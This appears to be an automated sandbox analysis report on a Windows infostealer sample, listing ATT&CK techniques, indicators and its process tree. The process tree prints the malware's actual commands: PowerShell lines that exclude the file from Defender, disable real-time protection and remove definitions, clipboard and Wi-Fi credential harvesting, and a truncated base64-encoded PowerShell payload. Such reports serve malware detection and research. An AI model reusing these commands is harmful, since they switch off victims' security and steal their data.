f2e0dac2c442b719830fca154ca9f80236ad986e0484ab350008008b0cf347fe

Analysis

max time kernel
99s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
23-11-2024 21:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

wavesecuritysuckslmao.exe
Size

6.9MB
MD5

5a899f165ade5e48a0c3c8451976f078
SHA1

1da2c03159372fa956dc325e8ae2b9244ce3c4fd
SHA256

f2e0dac2c442b719830fca154ca9f80236ad986e0484ab350008008b0cf347fe
SHA512

33ee5e8662db2ac46e5d1774c1e0b6f3963c752a5d09fb85c6bdcb24248d0bde9960a8e35e5fe03fd00749aeff6d5b3569d6dd3682f88f5f040656b9c1289df9
SSDEEP

98304:10xvITBg6dsBamaHl3Ne4i3lqoFhTWrf9eQc0MJYzwZNqkzmas5J1n6ksB0rNHMv:1oIp5eNlpYfMQc2sEhn6ksqK

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1684	powershell.exe
3120	powershell.exe
116	powershell.exe
4876	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3028	powershell.exe
3144	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3232	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe
4940	wavesecuritysuckslmao.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
25	discord.com
26	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
4884	tasklist.exe
456	tasklist.exe
2792	tasklist.exe
3256	tasklist.exe

UPX packed file 60 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023ccb-21.dat	upx
behavioral2/memory/4940-25-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp	upx
behavioral2/files/0x0007000000023cbe-27.dat	upx
behavioral2/files/0x0007000000023cc9-29.dat	upx
behavioral2/files/0x0007000000023cc5-48.dat	upx
behavioral2/files/0x0007000000023cc4-47.dat	upx
behavioral2/files/0x0007000000023cc3-46.dat	upx
behavioral2/files/0x0007000000023cc2-45.dat	upx
behavioral2/files/0x0007000000023cc1-44.dat	upx
behavioral2/files/0x0007000000023cc0-43.dat	upx
behavioral2/files/0x0007000000023cbf-42.dat	upx
behavioral2/files/0x0007000000023cbd-41.dat	upx
behavioral2/files/0x0007000000023cd0-40.dat	upx
behavioral2/files/0x0007000000023ccf-39.dat	upx
behavioral2/files/0x0007000000023cce-38.dat	upx
behavioral2/files/0x0007000000023cca-35.dat	upx
behavioral2/files/0x0007000000023cc8-34.dat	upx
behavioral2/memory/4940-32-0x00007FFBDD460000-0x00007FFBDD46F000-memory.dmp	upx
behavioral2/memory/4940-30-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp	upx
behavioral2/memory/4940-54-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp	upx
behavioral2/memory/4940-56-0x00007FFBDC260000-0x00007FFBDC279000-memory.dmp	upx
behavioral2/memory/4940-58-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp	upx
behavioral2/memory/4940-60-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp	upx
behavioral2/memory/4940-62-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp	upx
behavioral2/memory/4940-64-0x00007FFBD8410000-0x00007FFBD841D000-memory.dmp	upx
behavioral2/memory/4940-66-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp	upx
behavioral2/memory/4940-70-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp	upx
behavioral2/memory/4940-74-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp	upx
behavioral2/memory/4940-73-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp	upx
behavioral2/memory/4940-71-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp	upx
behavioral2/memory/4940-76-0x00007FFBD8370000-0x00007FFBD8384000-memory.dmp	upx
behavioral2/memory/4940-81-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp	upx
behavioral2/memory/4940-79-0x00007FFBD5880000-0x00007FFBD588D000-memory.dmp	upx
behavioral2/memory/4940-78-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp	upx
behavioral2/memory/4940-102-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp	upx
behavioral2/memory/4940-108-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp	upx
behavioral2/memory/4940-109-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp	upx
behavioral2/memory/4940-216-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp	upx
behavioral2/memory/4940-274-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp	upx
behavioral2/memory/4940-278-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp	upx
behavioral2/memory/4940-303-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp	upx
behavioral2/memory/4940-311-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp	upx
behavioral2/memory/4940-297-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp	upx
behavioral2/memory/4940-298-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp	upx
behavioral2/memory/4940-332-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp	upx
behavioral2/memory/4940-347-0x00007FFBC5610000-0x00007FFBC5BF9000-memory.dmp	upx
behavioral2/memory/4940-372-0x00007FFBD4C40000-0x00007FFBD4CF8000-memory.dmp	upx
behavioral2/memory/4940-371-0x00007FFBD4E20000-0x00007FFBD4E4E000-memory.dmp	upx
behavioral2/memory/4940-370-0x00007FFBD8410000-0x00007FFBD841D000-memory.dmp	upx
behavioral2/memory/4940-369-0x00007FFBDA6A0000-0x00007FFBDA6B9000-memory.dmp	upx
behavioral2/memory/4940-368-0x00007FFBD44E0000-0x00007FFBD4650000-memory.dmp	upx
behavioral2/memory/4940-367-0x00007FFBD5920000-0x00007FFBD5943000-memory.dmp	upx
behavioral2/memory/4940-366-0x00007FFBDC260000-0x00007FFBDC279000-memory.dmp	upx
behavioral2/memory/4940-365-0x00007FFBD8440000-0x00007FFBD846D000-memory.dmp	upx
behavioral2/memory/4940-364-0x00007FFBDD460000-0x00007FFBDD46F000-memory.dmp	upx
behavioral2/memory/4940-363-0x00007FFBD8770000-0x00007FFBD8794000-memory.dmp	upx
behavioral2/memory/4940-362-0x00007FFBC5290000-0x00007FFBC5605000-memory.dmp	upx
behavioral2/memory/4940-361-0x00007FFBD4A10000-0x00007FFBD4B2C000-memory.dmp	upx
behavioral2/memory/4940-360-0x00007FFBD5880000-0x00007FFBD588D000-memory.dmp	upx
behavioral2/memory/4940-359-0x00007FFBD8370000-0x00007FFBD8384000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3020	cmd.exe
4876	netsh.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1280	WMIC.exe
4596	WMIC.exe
4956	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3612	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3120	powershell.exe
4876	powershell.exe
3120	powershell.exe
4876	powershell.exe
3028	powershell.exe
3028	powershell.exe
3028	powershell.exe
4768	powershell.exe
4768	powershell.exe
4768	powershell.exe
116	powershell.exe
116	powershell.exe
2976	powershell.exe
2976	powershell.exe
1684	powershell.exe
1684	powershell.exe
2828	powershell.exe
2828	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4884	tasklist.exe
Token: SeDebugPrivilege	3120	powershell.exe
Token: SeDebugPrivilege	4876	powershell.exe
Token: SeIncreaseQuotaPrivilege	3660	WMIC.exe
Token: SeSecurityPrivilege	3660	WMIC.exe
Token: SeTakeOwnershipPrivilege	3660	WMIC.exe
Token: SeLoadDriverPrivilege	3660	WMIC.exe
Token: SeSystemProfilePrivilege	3660	WMIC.exe
Token: SeSystemtimePrivilege	3660	WMIC.exe
Token: SeProfSingleProcessPrivilege	3660	WMIC.exe
Token: SeIncBasePriorityPrivilege	3660	WMIC.exe
Token: SeCreatePagefilePrivilege	3660	WMIC.exe
Token: SeBackupPrivilege	3660	WMIC.exe
Token: SeRestorePrivilege	3660	WMIC.exe
Token: SeShutdownPrivilege	3660	WMIC.exe
Token: SeDebugPrivilege	3660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3660	WMIC.exe
Token: SeRemoteShutdownPrivilege	3660	WMIC.exe
Token: SeUndockPrivilege	3660	WMIC.exe
Token: SeManageVolumePrivilege	3660	WMIC.exe
Token: 33	3660	WMIC.exe
Token: 34	3660	WMIC.exe
Token: 35	3660	WMIC.exe
Token: 36	3660	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3660	WMIC.exe
Token: SeSecurityPrivilege	3660	WMIC.exe
Token: SeTakeOwnershipPrivilege	3660	WMIC.exe
Token: SeLoadDriverPrivilege	3660	WMIC.exe
Token: SeSystemProfilePrivilege	3660	WMIC.exe
Token: SeSystemtimePrivilege	3660	WMIC.exe
Token: SeProfSingleProcessPrivilege	3660	WMIC.exe
Token: SeIncBasePriorityPrivilege	3660	WMIC.exe
Token: SeCreatePagefilePrivilege	3660	WMIC.exe
Token: SeBackupPrivilege	3660	WMIC.exe
Token: SeRestorePrivilege	3660	WMIC.exe
Token: SeShutdownPrivilege	3660	WMIC.exe
Token: SeDebugPrivilege	3660	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3660	WMIC.exe
Token: SeRemoteShutdownPrivilege	3660	WMIC.exe
Token: SeUndockPrivilege	3660	WMIC.exe
Token: SeManageVolumePrivilege	3660	WMIC.exe
Token: 33	3660	WMIC.exe
Token: 34	3660	WMIC.exe
Token: 35	3660	WMIC.exe
Token: 36	3660	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4956	WMIC.exe
Token: SeSecurityPrivilege	4956	WMIC.exe
Token: SeTakeOwnershipPrivilege	4956	WMIC.exe
Token: SeLoadDriverPrivilege	4956	WMIC.exe
Token: SeSystemProfilePrivilege	4956	WMIC.exe
Token: SeSystemtimePrivilege	4956	WMIC.exe
Token: SeProfSingleProcessPrivilege	4956	WMIC.exe
Token: SeIncBasePriorityPrivilege	4956	WMIC.exe
Token: SeCreatePagefilePrivilege	4956	WMIC.exe
Token: SeBackupPrivilege	4956	WMIC.exe
Token: SeRestorePrivilege	4956	WMIC.exe
Token: SeShutdownPrivilege	4956	WMIC.exe
Token: SeDebugPrivilege	4956	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4956	WMIC.exe
Token: SeRemoteShutdownPrivilege	4956	WMIC.exe
Token: SeUndockPrivilege	4956	WMIC.exe
Token: SeManageVolumePrivilege	4956	WMIC.exe
Token: 33	4956	WMIC.exe
Token: 34	4956	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5008 wrote to memory of 4940	5008	wavesecuritysuckslmao.exe	84
PID 5008 wrote to memory of 4940	5008	wavesecuritysuckslmao.exe	84
PID 4940 wrote to memory of 1932	4940	wavesecuritysuckslmao.exe	85
PID 4940 wrote to memory of 1932	4940	wavesecuritysuckslmao.exe	85
PID 4940 wrote to memory of 3680	4940	wavesecuritysuckslmao.exe	86
PID 4940 wrote to memory of 3680	4940	wavesecuritysuckslmao.exe	86
PID 4940 wrote to memory of 3996	4940	wavesecuritysuckslmao.exe	87
PID 4940 wrote to memory of 3996	4940	wavesecuritysuckslmao.exe	87
PID 4940 wrote to memory of 1328	4940	wavesecuritysuckslmao.exe	91
PID 4940 wrote to memory of 1328	4940	wavesecuritysuckslmao.exe	91
PID 1932 wrote to memory of 4876	1932	cmd.exe	93
PID 1932 wrote to memory of 4876	1932	cmd.exe	93
PID 4940 wrote to memory of 2332	4940	wavesecuritysuckslmao.exe	94
PID 4940 wrote to memory of 2332	4940	wavesecuritysuckslmao.exe	94
PID 3996 wrote to memory of 2128	3996	cmd.exe	96
PID 3996 wrote to memory of 2128	3996	cmd.exe	96
PID 1328 wrote to memory of 4884	1328	cmd.exe	97
PID 1328 wrote to memory of 4884	1328	cmd.exe	97
PID 3680 wrote to memory of 3120	3680	cmd.exe	98
PID 3680 wrote to memory of 3120	3680	cmd.exe	98
PID 2332 wrote to memory of 3660	2332	cmd.exe	99
PID 2332 wrote to memory of 3660	2332	cmd.exe	99
PID 4940 wrote to memory of 516	4940	wavesecuritysuckslmao.exe	101
PID 4940 wrote to memory of 516	4940	wavesecuritysuckslmao.exe	101
PID 516 wrote to memory of 4732	516	cmd.exe	103
PID 516 wrote to memory of 4732	516	cmd.exe	103
PID 4940 wrote to memory of 3696	4940	wavesecuritysuckslmao.exe	104
PID 4940 wrote to memory of 3696	4940	wavesecuritysuckslmao.exe	104
PID 3696 wrote to memory of 1408	3696	cmd.exe	106
PID 3696 wrote to memory of 1408	3696	cmd.exe	106
PID 4940 wrote to memory of 1812	4940	wavesecuritysuckslmao.exe	107
PID 4940 wrote to memory of 1812	4940	wavesecuritysuckslmao.exe	107
PID 1812 wrote to memory of 4956	1812	cmd.exe	109
PID 1812 wrote to memory of 4956	1812	cmd.exe	109
PID 4940 wrote to memory of 3392	4940	wavesecuritysuckslmao.exe	110
PID 4940 wrote to memory of 3392	4940	wavesecuritysuckslmao.exe	110
PID 3392 wrote to memory of 1280	3392	cmd.exe	112
PID 3392 wrote to memory of 1280	3392	cmd.exe	112
PID 4940 wrote to memory of 4552	4940	wavesecuritysuckslmao.exe	113
PID 4940 wrote to memory of 4552	4940	wavesecuritysuckslmao.exe	113
PID 4940 wrote to memory of 812	4940	wavesecuritysuckslmao.exe	114
PID 4940 wrote to memory of 812	4940	wavesecuritysuckslmao.exe	114
PID 812 wrote to memory of 456	812	cmd.exe	117
PID 812 wrote to memory of 456	812	cmd.exe	117
PID 4552 wrote to memory of 2792	4552	cmd.exe	118
PID 4552 wrote to memory of 2792	4552	cmd.exe	118
PID 4940 wrote to memory of 4244	4940	wavesecuritysuckslmao.exe	119
PID 4940 wrote to memory of 4244	4940	wavesecuritysuckslmao.exe	119
PID 4940 wrote to memory of 3144	4940	wavesecuritysuckslmao.exe	120
PID 4940 wrote to memory of 3144	4940	wavesecuritysuckslmao.exe	120
PID 4940 wrote to memory of 1712	4940	wavesecuritysuckslmao.exe	121
PID 4940 wrote to memory of 1712	4940	wavesecuritysuckslmao.exe	121
PID 4940 wrote to memory of 3056	4940	wavesecuritysuckslmao.exe	123
PID 4940 wrote to memory of 3056	4940	wavesecuritysuckslmao.exe	123
PID 4244 wrote to memory of 232	4244	cmd.exe	127
PID 4244 wrote to memory of 232	4244	cmd.exe	127
PID 4940 wrote to memory of 3020	4940	wavesecuritysuckslmao.exe	128
PID 4940 wrote to memory of 3020	4940	wavesecuritysuckslmao.exe	128
PID 4940 wrote to memory of 3768	4940	wavesecuritysuckslmao.exe	129
PID 4940 wrote to memory of 3768	4940	wavesecuritysuckslmao.exe	129
PID 4940 wrote to memory of 4496	4940	wavesecuritysuckslmao.exe	132
PID 4940 wrote to memory of 4496	4940	wavesecuritysuckslmao.exe	132
PID 3144 wrote to memory of 3028	3144	cmd.exe	134
PID 3144 wrote to memory of 3028	3144	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe
"C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5008
- C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe
  "C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wavesecuritysuckslmao.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3120
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('wave patched it', 0, 'error', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3996
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('wave patched it', 0, 'error', 0+16);close()"
      4⤵
      PID:2128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1328
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:516
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1812
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:4956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:1280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:812
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4244
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1712
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3056
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3020
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3768
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0A